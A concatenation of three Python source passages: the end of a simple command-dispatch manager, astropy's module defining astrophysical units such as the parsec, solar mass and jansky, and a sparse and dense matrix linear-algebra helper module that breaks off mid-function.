def __init__(self, path=None, prefix=None):
# Load the Commands Subclasses
self.cmdcls = get_resource_classes(path, prefix)
self.commands = [c.__name__ for c in self.cmdcls]
self.commands.append("help")
# Building Help Commands
self.helpstr = "Available Commands \n"
self.helpstr += "****************************************************\n"
for cls in self.cmdcls:
self.helpstr += cls.__name__ + " -------" + cls.description + "\n"
self.helpstr += "****************************************************\n"
def helpfn(self, arg=None):
arg = [str(a) for a in arg if a]
print arg
if len(arg)>=1 and arg[0] in self.commands:
result = "****************************************************\n"
for cls in self.cmdcls:
if self.isequal(str(arg[0]), str(cls.__name__)):
result+= cls.details + "\n"
result += "****************************************************\n"
return result
return self.helpstr
def list(self, filter="*"):
# return the commands name
res = []
if filter == "*":
return self.commands
else:
for cmd in self.commands:
match = re.match(r'(%s)' % filter, cmd, re.M | re.I)
if match:
res.append(cmd)
return res
def isequal(self, a, b):
return a.upper() == b.upper()
def execute(self, cmdname):
# cmd may have mutliple parts . first part is cmd, remaining parts are args
cmd = cmdname.split()
x = len(cmd)
# No Command entered, user pressed enter
if x == 0:
return None
# populating args for commands
args = []
if x != 0:
args += cmd[1:]
if cmd[0] in ["help", "Help", "HELP"]:
return self.helpfn(args)
# get the command object and execute call function
for c in self.cmdcls:
if self.isequal(str(cmd[0]), str(c.__name__)):
return c()(args)
return "Error : Command Not Found"
if __name__ == "__main__":
cm = CommandManager()
print cm.list("*")
print cm.list("H")
print cm.list("He")
print cm.list("Pi")
#print cm.execute("Help")
#print get_resource_classes()
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
# Licensed under a 3-clause BSD style license - see LICENSE.rst
"""
This package defines the astrophysics-specific units. They are also
available in the `astropy.units` namespace.
"""
from . import si
from astropy.constants import si as _si
from .core import (UnitBase, def_unit, si_prefixes, binary_prefixes,
set_enabled_units)
# To ensure si units of the constants can be interpreted.
set_enabled_units([si])
import numpy as _numpy
_ns = globals()
###########################################################################
# LENGTH
def_unit((['AU', 'au'], ['astronomical_unit']), _si.au, namespace=_ns, prefixes=True,
doc="astronomical unit: approximately the mean Earth--Sun "
"distance.")
def_unit(['pc', 'parsec'], _si.pc, namespace=_ns, prefixes=True,
doc="parsec: approximately 3.26 light-years.")
def_unit(['solRad', 'R_sun', 'Rsun'], _si.R_sun, namespace=_ns,
doc="Solar radius", prefixes=False,
format={'latex': r'R_{\odot}', 'unicode': 'R⊙'})
def_unit(['jupiterRad', 'R_jup', 'Rjup', 'R_jupiter', 'Rjupiter'],
_si.R_jup, namespace=_ns, prefixes=False, doc="Jupiter radius",
# LaTeX jupiter symbol requires wasysym
format={'latex': r'R_{\rm J}', 'unicode': 'R♃'})
def_unit(['earthRad', 'R_earth', 'Rearth'], _si.R_earth, namespace=_ns,
prefixes=False, doc="Earth radius",
# LaTeX earth symbol requires wasysym
format={'latex': r'R_{\oplus}', 'unicode': 'R⊕'})
def_unit(['lyr', 'lightyear'], (_si.c * si.yr).to(si.m),
namespace=_ns, prefixes=True, doc="Light year")
###########################################################################
# AREAS
def_unit(['barn', 'barn'], 10 ** -28 * si.m ** 2, namespace=_ns, prefixes=True,
doc="barn: unit of area used in HEP")
###########################################################################
# ANGULAR MEASUREMENTS
def_unit(['cycle', 'cy'], 2.0 * _numpy.pi * si.rad,
namespace=_ns, prefixes=False,
doc="cycle: angular measurement, a full turn or rotation")
def_unit(['spat', 'sp'], 4.0 * _numpy.pi * si.sr,
namespace=_ns, prefixes=False,
doc="spat: the solid angle of the sphere, 4pi sr")
###########################################################################
# MASS
def_unit(['solMass', 'M_sun', 'Msun'], _si.M_sun, namespace=_ns,
prefixes=False, doc="Solar mass",
format={'latex': r'M_{\odot}', 'unicode': 'M⊙'})
def_unit(['jupiterMass', 'M_jup', 'Mjup', 'M_jupiter', 'Mjupiter'],
_si.M_jup, namespace=_ns, prefixes=False, doc="Jupiter mass",
# LaTeX jupiter symbol requires wasysym
format={'latex': r'M_{\rm J}', 'unicode': 'M♃'})
def_unit(['earthMass', 'M_earth', 'Mearth'], _si.M_earth, namespace=_ns,
prefixes=False, doc="Earth mass",
# LaTeX earth symbol requires wasysym
format={'latex': r'M_{\oplus}', 'unicode': 'M⊕'})
def_unit(['M_p'], _si.m_p, namespace=_ns, doc="Proton mass",
format={'latex': r'M_{p}', 'unicode': 'Mₚ'})
def_unit(['M_e'], _si.m_e, namespace=_ns, doc="Electron mass",
format={'latex': r'M_{e}', 'unicode': 'Mₑ'})
# Unified atomic mass unit
def_unit(['u', 'Da', 'Dalton'], _si.u, namespace=_ns,
prefixes=True, exclude_prefixes=['a', 'da'],
doc="Unified atomic mass unit")
##########################################################################
# ENERGY
# Here, explicitly convert the planck constant to 'eV s' since the constant
# can override that to give a more precise value that takes into account
# covariances between e and h. Eventually, this may also be replaced with
# just `_si.Ryd.to(eV)`.
def_unit(['Ry', 'rydberg'],
(_si.Ryd * _si.c * _si.h.to(si.eV * si.s)).to(si.eV),
namespace=_ns, prefixes=True,
doc="Rydberg: Energy of a photon whose wavenumber is the Rydberg "
"constant",
format={'latex': r'R_{\infty}', 'unicode': 'R∞'})
##########################################################################
# PRESSURE
def_unit(['bar'], 1e5 * si.Pa, namespace=_ns,
prefixes=[(['m'], ['milli'], 1.e-3)],
doc="bar: pressure")
###########################################################################
# ILLUMINATION
def_unit(['solLum', 'L_sun', 'Lsun'], _si.L_sun, namespace=_ns,
prefixes=False, doc="Solar luminance",
format={'latex': r'L_{\odot}', 'unicode': 'L⊙'})
###########################################################################
# SPECTRAL DENSITY
def_unit((['ph', 'photon'], ['photon']),
format={'ogip': 'photon', 'vounit': 'photon'},
namespace=_ns, prefixes=True)
def_unit(['Jy', 'Jansky', 'jansky'], 1e-26 * si.W / si.m ** 2 / si.Hz,
namespace=_ns, prefixes=True,
doc="Jansky: spectral flux density")
def_unit(['R', 'Rayleigh', 'rayleigh'],
(1e10 / (4 * _numpy.pi)) *
ph * si.m ** -2 * si.s ** -1 * si.sr ** -1,
namespace=_ns, prefixes=True,
doc="Rayleigh: photon flux")
###########################################################################
# MISCELLANEOUS
# Some of these are very FITS-specific and perhaps considered a mistake.
# Maybe they should be moved into the FITS format class?
# TODO: This is defined by the FITS standard as "relative to the sun".
# Is that mass, volume, what?
def_unit(['Sun'], namespace=_ns)
###########################################################################
# EVENTS
def_unit((['ct', 'count'], ['count']),
format={'fits': 'count', 'ogip': 'count', 'vounit': 'count'},
namespace=_ns, prefixes=True, exclude_prefixes=['p'])
def_unit((['pix', 'pixel'], ['pixel']),
format={'ogip': 'pixel', 'vounit': 'pixel'},
namespace=_ns, prefixes=True)
###########################################################################
# MISCELLANEOUS
def_unit(['chan'], namespace=_ns, prefixes=True)
def_unit(['bin'], namespace=_ns, prefixes=True)
def_unit((['vox', 'voxel'], ['voxel']),
format={'fits': 'voxel', 'ogip': 'voxel', 'vounit': 'voxel'},
namespace=_ns, prefixes=True)
def_unit((['bit', 'b'], ['bit']), namespace=_ns,
prefixes=si_prefixes + binary_prefixes)
def_unit((['byte', 'B'], ['byte']), 8 * bit, namespace=_ns,
format={'vounit': 'byte'},
prefixes=si_prefixes + binary_prefixes,
exclude_prefixes=['d'])
def_unit(['adu'], namespace=_ns, prefixes=True)
def_unit(['beam'], namespace=_ns, prefixes=True)
def_unit(['electron'], doc="Number of electrons", namespace=_ns,
format={'latex': r'e^{-}', 'unicode': 'e⁻'})
# This is not formally a unit, but is used in that way in many contexts, and
# an appropriate equivalency is only possible if it's treated as a unit (see
# https://arxiv.org/pdf/1308.4150.pdf for more)
# Also note that h or h100 or h_100 would be a better name, but they either
# conflict or have numbers in them, which is apparently disallowed
def_unit(['littleh'], namespace=_ns, prefixes=False,
doc="Reduced/\"dimensionless\" Hubble constant",
format={'latex': r'h_{100}'})
# The torr is almost the same as mmHg but not quite.
# See https://en.wikipedia.org/wiki/Torr
# Define the unit here despite it not being an astrophysical unit.
# It may be moved if more similar units are created later.
def_unit(['Torr', 'torr'], _si.atm.value/760. * si.Pa, namespace=_ns,
prefixes=[(['m'], ['milli'], 1.e-3)],
doc="Unit of pressure based on an absolute scale, now defined as "
"exactly 1/760 of a standard atmosphere")
###########################################################################
# CLEANUP
del UnitBase
del def_unit
del si
###########################################################################
# DOCSTRING
# This generates a docstring for this module that describes all of the
# standard units defined here.
from .utils import generate_unit_summary as _generate_unit_summary
if __doc__ is not None:
__doc__ += _generate_unit_summary(globals())
| nilq/baby-python | python |
"""
#########################
Linalg (``utils.linalg``)
#########################
Linear algebra helper routines and wrapper functions for handling sparse
matrices and dense matrices representation.
"""
import sys
import copy
import numpy as np
import scipy
import scipy.sparse as sp
import scipy.sparse.linalg as sla
import numpy.linalg as nla
from operator import mul, eq, ne, add, ge, le, itemgetter
from operator import truediv as div
from math import sqrt, log, isnan, ceil
from scipy.cluster.hierarchy import linkage, cophenet
from scipy.special import erfc, erfcinv
import warnings
#
# Wrapper functions for handling sparse matrices and dense matrices representation.
### scipy.sparse, numpy.matrix
#
def diff(X):
"""
Compute differences between adjacent elements of X.
:param X: Vector for which consecutive differences are computed.
:type X: :class:`numpy.matrix`
"""
assert 1 in X.shape, "sX should be a vector."
assert not sp.isspmatrix(X), "X is sparse matrix."
X = X.flatten()
return [X[0, j + 1] - X[0, j] for j in range(X.shape[1] - 1)]
def sub2ind(shape, row_sub, col_sub):
"""
Return the linear index equivalents to the row and column subscripts for
given matrix shape.
:param shape: Preferred matrix shape for subscripts conversion.
:type shape: `tuple`
:param row_sub: Row subscripts.
:type row_sub: `list`
:param col_sub: Column subscripts.
:type col_sub: `list`
"""
assert len(row_sub) == len(
col_sub), "Row and column subscripts do not match."
res = [j * shape[0] + i for i, j in zip(row_sub, col_sub)]
return res
def trace(X):
"""
Return trace of sparse or dense square matrix X.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
assert X.shape[0] == X.shape[1], "X should be square matrix."
if sp.isspmatrix(X):
return sum(X[i, i] for i in range(X.shape[0]))
else:
return np.trace(np.mat(X))
def any(X, axis=None):
"""
Test whether any element along a given axis of sparse or dense matrix X is nonzero.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specified axis along which nonzero test is performed.
If :param:`axis` not specified, whole matrix is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if axis is None:
return len(X.data) != X.shape[0] * X.shape[1]
res = [0 for _ in range(X.shape[1 - axis])]
def _caxis(now, row, col):
res[col] += 1
def _raxis(now, row, col):
res[row] += 1
check = _caxis if axis == 0 else _raxis
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
check(now, row, col)
now += 1
sol = [x != 0 for x in res]
return np.mat(sol) if axis == 0 else np.mat(sol).T
else:
return X.any(axis)
def all(X, axis=None):
"""
Test whether all elements along a given axis of sparse or dense matrix
:param:`X` are nonzero.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param axis: Specified axis along which nonzero test is performed.
If :param:`axis` not specified, whole matrix is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if axis is None:
return len(X.data) == X.shape[0] * X.shape[1]
res = [0 for _ in range(X.shape[1 - axis])]
def _caxis(now, row, col):
res[col] += 1
def _raxis(now, row, col):
res[row] += 1
check = _caxis if axis == 0 else _raxis
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
check(now, row, col)
now += 1
sol = [x == X.shape[0] if axis == 0 else x == X.shape[1] for x in res]
return np.mat(sol) if axis == 0 else np.mat(sol).T
else:
return X.all(axis)
def find(X):
"""
Return all nonzero elements indices (linear indices) of sparse or dense
matrix :param:`X`. It is Matlab notation.
:param X: Target matrix.
type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
X = X.tocsr()
res = []
now = 0
for row in range(X.shape[0]):
upto = X.indptr[row + 1]
while now < upto:
col = X.indices[now]
if X.data[now]:
res.append(col * X.shape[0] + row)
now += 1
return res
else:
return [j * X.shape[0] + i for i in range(X.shape[0]) for j in range(X.shape[1]) if X[i, j]]
def negative(X):
"""
Check if :param:`X` contains negative elements.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
if any(X.data < 0):
return True
else:
if any(np.asmatrix(X) < 0):
return True
def sort(X):
"""
Return sorted elements of :param:`X` and array of corresponding
sorted indices.
:param X: Target vector.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
assert 1 in X.shape, "X should be vector."
X = X.flatten().tolist()[0]
return sorted(X), sorted(list(range(len(X))), key=X.__getitem__)
def std(X, axis=None, ddof=0):
"""
Compute the standard deviation along the specified :param:`axis` of
matrix :param:`X`.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Axis along which deviation is computed. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
:param ddof: Means delta degrees of freedom. The divisor used in
computation is N - :param:`ddof`, where N represents the
number of elements. Default is 0.
:type ddof: `float`
"""
assert len(X.shape) == 2, "Input matrix X should be 2-D."
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
if sp.isspmatrix(X):
if axis is None:
mean = X.mean()
no = X.shape[0] * X.shape[1]
return sqrt(1. / (no - ddof) * sum((x - mean) ** 2 for x in X.data) + (no - len(X.data) * mean ** 2))
if axis == 0:
return np.mat([np.std(X[:, i].toarray(), axis, ddof) for i in range(X.shape[1])])
if axis == 1:
return np.mat([np.std(X[i, :].toarray(), axis, ddof) for i in range(X.shape[0])]).T
else:
return np.std(X, axis=axis, ddof=ddof)
def argmax(X, axis=None):
"""
Return tuple (values, indices) of the maximum entries of matrix
:param:`X` along axis :param:`axis`. Row major order.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specify axis along which to operate. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
res = [[float('-inf'), 0]
for _ in range(X.shape[1 - axis])] if axis is not None else [float('-inf'), 0]
def _caxis(row, col):
if X[row, col] > res[col][0]:
res[col] = (X[row, col], row)
def _raxis(row, col):
if X[row, col] > res[row][0]:
res[row] = (X[row, col], col)
def _naxis(row, col):
if X[row, col] > res[0]:
res[0] = X[row, col]
res[1] = row * X.shape[0] + col
check = _caxis if axis == 0 else _raxis if axis == 1 else _naxis
[check(row, col) for row in range(X.shape[0])
for col in range(X.shape[1])]
if axis is None:
return res
elif axis == 0:
t = list(zip(*res))
return list(t[0]), np.mat(t[1])
else:
t = list(zip(*res))
return list(t[0]), np.mat(t[1]).T
else:
idxX = np.asmatrix(X).argmax(axis)
if axis is None:
eX = X[idxX // X.shape[1], idxX % X.shape[1]]
elif axis == 0:
eX = [X[idxX[0, idx], col]
for idx, col in zip(range(X.shape[1]), range(X.shape[1]))]
else:
eX = [X[row, idxX[idx, 0]]
for row, idx in zip(range(X.shape[0]), range(X.shape[0]))]
return eX, idxX
def argmin(X, axis=None):
"""
Return tuple (values, indices) of the minimum entries of matrix :param:`X`
along axis :param:`axis`. Row major order.
:param X: Target matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param axis: Specify axis along which to operate. If not specified,
whole matrix :param:`X` is considered.
:type axis: `int`
"""
if sp.isspmatrix(X):
X = X.tocsr()
assert axis == 0 or axis == 1 or axis is None, "Incorrect axis number."
res = [[float('inf'), 0]
for _ in range(X.shape[1 - axis])] if axis is not None else [float('inf'), 0]
def _caxis(row, col):
if X[row, col] < res[col][0]:
res[col] = (X[row, col], row)
def _raxis(row, col):
if X[row, col] < res[row][0]:
res[row] = (X[row, col], col)
def _naxis(row, col):
if X[row, col] < res[0]:
res[0] = X[row, col]
res[1] = row * X.shape[0] + col
check = _caxis if axis == 0 else _raxis if axis == 1 else _naxis
[check(row, col) for row in range(X.shape[0])
for col in range(X.shape[1])]
if axis is None:
return res
elif axis == 0:
t = list(zip(*res))
return list(t[0]), np.mat(t[1])
else:
t = list(zip(*res))
return list(t[0]), np.mat(t[1]).T
else:
idxX = np.asmatrix(X).argmin(axis)
if axis is None:
eX = X[idxX // X.shape[1], idxX % X.shape[1]]
elif axis == 0:
eX = [X[idxX[0, idx], col]
for idx, col in zip(range(X.shape[1]), range(X.shape[1]))]
else:
eX = [X[row, idxX[idx, 0]]
for row, idx in zip(range(X.shape[0]), range(X.shape[0]))]
return eX, idxX
def repmat(X, m, n):
"""
Construct matrix consisting of an m-by-n tiling of copies of X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
:param m,n: The number of repetitions of :param:`X` along each axis.
:type m,n: `int`
"""
if sp.isspmatrix(X):
return sp.hstack([sp.vstack([X for _ in range(m)], format=X.format) for _ in range(n)], format=X.format)
else:
return np.tile(np.asmatrix(X), (m, n))
def inv_svd(X):
"""
Compute matrix inversion using SVD.
:param X: The input matrix.
:type X: :class:`scipy.sparse` or :class:`numpy.matrix`
"""
U, S, V = svd(X)
if sp.isspmatrix(S):
S_inv = _sop_spmatrix(S, op=lambda x: 1. / x)
else:
S_inv = np.diag(1. / np.diagonal(S))
X_inv = dot(dot(V.T, S_inv), U.T)
return X_inv
def svd(X):
"""
Compute standard SVD on matrix X.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil,
dia or :class:`numpy.matrix`
"""
if sp.isspmatrix(X):
if X.shape[0] <= X.shape[1]:
U, S, V = _svd_left(X)
else:
U, S, V = _svd_right(X)
else:
U, S, V = nla.svd(np.mat(X), full_matrices=False)
S = np.mat(np.diag(S))
return U, S, V
def _svd_right(X):
"""
Compute standard SVD on matrix X. Scipy.sparse.linalg.svd ARPACK does
not allow computation of rank(X) SVD.
:param X: The input sparse matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
"""
XXt = dot(X, X.T)
if X.shape[0] > 1:
if '0.8' in scipy.version.version:
val, u_vec = sla.eigen_symmetric(XXt, k=X.shape[0] - 1)
else:
# In scipy 0.9.0 ARPACK interface has changed. eigen_symmetric
# routine was renamed to eigsh
# http://docs.scipy.org/doc/scipy/reference/release.0.9.0.html#scipy-sparse
try:
val, u_vec = sla.eigsh(XXt, k=X.shape[0] - 1)
except sla.ArpackNoConvergence as err:
# If eigenvalue iteration fails to converge, partially
# converged results can be accessed
val = err.eigenvalues
u_vec = err.eigenvectors
else:
val, u_vec = nla.eigh(XXt.todense())
# remove insignificant eigenvalues
keep = np.where(val > 1e-7)[0]
u_vec = u_vec[:, keep]
val = val[keep]
# sort eigen vectors (descending)
idx = np.argsort(val)[::-1]
val = val[idx]
# construct U
U = sp.csr_matrix(u_vec[:, idx])
# compute S
tmp_val = np.sqrt(val)
tmp_l = len(idx)
S = sp.spdiags(tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
# compute V from inverse of S
inv_S = sp.spdiags(1. / tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
V = U.T * X
V = inv_S * V
return U, S, V
def _svd_left(X):
"""
Compute standard SVD on matrix X. Scipy.sparse.linalg.svd ARPACK does
not allow computation of rank(X) SVD.
:param X: The input sparse matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
"""
XtX = dot(X.T, X)
if X.shape[1] > 1:
if '0.9' in scipy.version.version or '0.10' in scipy.version.version or '0.11' in scipy.version.version:
# In scipy 0.9.0 ARPACK interface has changed. eigen_symmetric
# routine was renamed to eigsh
# http://docs.scipy.org/doc/scipy/reference/release.0.9.0.html#scipy-sparse
try:
val, v_vec = sla.eigsh(XtX, k=X.shape[1] - 1)
except sla.ArpackNoConvergence as err:
# If eigenvalue iteration fails to converge, partially
# converged results can be accessed
val = err.eigenvalues
v_vec = err.eigenvectors
else:
val, v_vec = sla.eigen_symmetric(XtX, k=X.shape[1] - 1)
else:
val, v_vec = nla.eigh(XtX.todense())
# remove insignificant eigenvalues
keep = np.where(val > 1e-7)[0]
v_vec = v_vec[:, keep]
val = val[keep]
# sort eigen vectors (descending)
idx = np.argsort(val)[::-1]
val = val[idx]
# construct V
V = sp.csr_matrix(v_vec[:, idx])
# compute S
tmp_val = np.sqrt(val)
tmp_l = len(idx)
S = sp.spdiags(tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
# compute U from inverse of S
inv_S = sp.spdiags(1. / tmp_val, 0, m=tmp_l, n=tmp_l, format='csr')
U = X * V * inv_S
V = V.T
return U, S, V
def dot(X, Y):
"""
Compute dot product of matrices :param:`X` and :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X) and sp.isspmatrix(Y):
return X * Y
elif sp.isspmatrix(X) or sp.isspmatrix(Y):
# avoid dense dot product with mixed factors
return sp.csr_matrix(X) * sp.csr_matrix(Y)
else:
return np.asmatrix(X) * np.asmatrix(Y)
def multiply(X, Y):
"""
Compute element-wise multiplication of matrices :param:`X` and :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
"""
if sp.isspmatrix(X) and sp.isspmatrix(Y):
return X.multiply(Y)
elif sp.isspmatrix(X) or sp.isspmatrix(Y):
return _op_spmatrix(X, Y, np.multiply)
else:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
return np.multiply(np.mat(X), np.mat(Y))
def power(X, s):
"""
Compute matrix power of matrix :param:`X` for power :param:`s`.
:param X: Input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: Power.
:type s: `int`
"""
if sp.isspmatrix(X):
Y = X.tocsr()
eps = np.finfo(Y.data.dtype).eps if not 'int' in str(
Y.data.dtype) else 0
return sp.csr_matrix((np.power(Y.data + eps, s), Y.indices, Y.indptr), Y.shape)
else:
eps = np.finfo(X.dtype).eps if not 'int' in str(X.dtype) else 0
return np.power(X + eps, s)
def sop(X, s=None, op=None):
"""
Compute scalar element wise operation of matrix :param:`X` and
scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
if sp.isspmatrix(X):
return _sop_spmatrix(X, s, op)
else:
return _sop_matrix(X, s, op)
def _sop_spmatrix(X, s=None, op=None):
"""
Compute sparse scalar element wise operation of matrix X and scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
R = X.copy().tocsr()
eps = np.finfo(R.dtype).eps if not 'int' in str(R.dtype) else 0
now = 0
for row in range(R.shape[0]):
upto = R.indptr[row + 1]
while now < upto:
R.data[now] = op(R.data[now] + eps, s) if s is not None else op(
R.data[now] + eps)
now += 1
return R
def _sop_matrix(X, s=None, op=None):
"""
Compute scalar element wise operation of matrix :param:`X` and scalar :param:`s`.
:param X: The input matrix.
:type X: :class:`numpy.matrix`
:param s: Input scalar. If not specified, element wise operation of input
matrix is computed.
:type s: `float`
:param op: Operation to be performed.
:type op: `func`
"""
eps = np.finfo(X.dtype).eps if not 'int' in str(X.dtype) else 0
return op(X + eps, s) if s is not None else op(X + eps)
def elop(X, Y, op):
"""
Compute element-wise operation of matrix :param:`X` and matrix :param:`Y`.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
try:
zp1 = op(0, 1) if sp.isspmatrix(X) else op(1, 0)
zp2 = op(0, 0)
zp = zp1 != 0 or zp2 != 0
except:
zp = 0
if sp.isspmatrix(X) or sp.isspmatrix(Y):
return _op_spmatrix(X, Y, op) if not zp else _op_matrix(X, Y, op)
else:
try:
X[X == 0] = np.finfo(X.dtype).eps
Y[Y == 0] = np.finfo(Y.dtype).eps
except ValueError:
return op(np.mat(X), np.mat(Y))
return op(np.mat(X), np.mat(Y))
def _op_spmatrix(X, Y, op):
"""
Compute sparse element-wise operation for operations preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
# distinction as op is not necessarily commutative
return __op_spmatrix(X, Y, op) if sp.isspmatrix(X) else __op_spmatrix(Y, X, op)
def __op_spmatrix(X, Y, op):
"""
Compute sparse element-wise operation for operations preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
:param Y: Second input matrix.
:type Y: :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
assert X.shape == Y.shape, "Matrices are not aligned."
eps = np.finfo(Y.dtype).eps if not 'int' in str(Y.dtype) else 0
Xx = X.tocsr()
r, c = Xx.nonzero()
R = op(Xx[r, c], Y[r, c] + eps)
R = np.array(R)
assert 1 in R.shape, "Data matrix in sparse should be rank-1."
R = R[0, :] if R.shape[0] == 1 else R[:, 0]
return sp.csr_matrix((R, Xx.indices, Xx.indptr), Xx.shape)
def _op_matrix(X, Y, op):
"""
Compute sparse element-wise operation for operations not preserving zeros.
:param X: First input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param Y: Second input matrix.
:type Y: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param op: Operation to be performed.
:type op: `func`
"""
# operation is not necessarily commutative
assert X.shape == Y.shape, "Matrices are not aligned."
eps = np.finfo(Y.dtype).eps if not 'int' in str(Y.dtype) else 0
return np.mat([[op(X[i, j], Y[i, j] + eps) for j in range(X.shape[1])] for i in range(X.shape[0])])
def inf_norm(X):
"""
Infinity norm of a matrix (maximum absolute row sum).
:param X: Input matrix.
:type X: :class:`scipy.sparse.csr_matrix`, :class:`scipy.sparse.csc_matrix`
or :class:`numpy.matrix`
"""
if sp.isspmatrix_csr(X) or sp.isspmatrix_csc(X):
# avoid copying index and ptr arrays
abs_X = X.__class__(
(abs(X.data), X.indices, X.indptr), shape=X.shape)
return (abs_X * np.ones((X.shape[1]), dtype=X.dtype)).max()
elif sp.isspmatrix(X):
return (abs(X) * np.ones((X.shape[1]), dtype=X.dtype)).max()
else:
return nla.norm(np.asmatrix(X), float('inf'))
def norm(X, p="fro"):
"""
Compute entry-wise norms (! not induced/operator norms).
:param X: The input matrix.
:type X: :class:`scipy.sparse` of format csr, csc, coo, bsr, dok, lil, dia
or :class:`numpy.matrix`
:param p: Order of the norm.
:type p: `str` or `float`
"""
assert 1 in X.shape or p != 2, "Computing entry-wise norms only."
if sp.isspmatrix(X):
fro = lambda X: sum(abs(x) ** 2 for x in X.data) ** (1. / 2)
inf = lambda X: abs(X).sum(
axis=1).max() if 1 not in X.shape else abs(X).max()
m_inf = lambda X: abs(X).sum(
axis=1).min() if 1 not in X.shape else abs(X).min()
one = lambda X: abs(X).sum(axis=0).max() if 1 not in X.shape else sum(
abs(x) ** p for x in X.data) ** (1. / p)
m_one = lambda X: abs(X).sum(axis=0).min() if 1 not in X.shape else sum(
abs(x) ** p for x in X.data) ** (1. / p)
v = {
"fro": fro,
"inf": inf,
"-inf": m_inf,
1: one,
-1: m_one,
}.get(p)
return v(X) if v != None else sum(abs(x) ** p for x in X.data) ** (1. / p)
else:
return nla.norm(np.mat(X), p)
def vstack(X, format=None, dtype=None):
"""
Stack sparse or dense matrices vertically (row wise).
:param X: Sequence of matrices with compatible shapes.
:type X: sequence of :class:`scipy.sparse` of format csr, csc, coo, bsr,
dok, lil, dia or :class:`numpy.matrix`
"""
if len([0 for x in X if not sp.isspmatrix(x)]) == 0:
# scipy.sparse bug
# return sp.vstack(X, format = X[0].getformat() if format is None else
# format, dtype = X[0].dtype if dtype is None else dtype)
return sp.vstack(X)
else:
return np.vstack(X)
def hstack(X, format=None, dtype=None):
"""
Stack sparse or dense matrices horizontally (column wise).
:param X: Sequence of matrices with compatible shapes.
:type X: sequence of :class:`scipy.sparse` of format csr, csc, coo, bsr,
dok, lil, dia or :class:`numpy.matrix`
"""
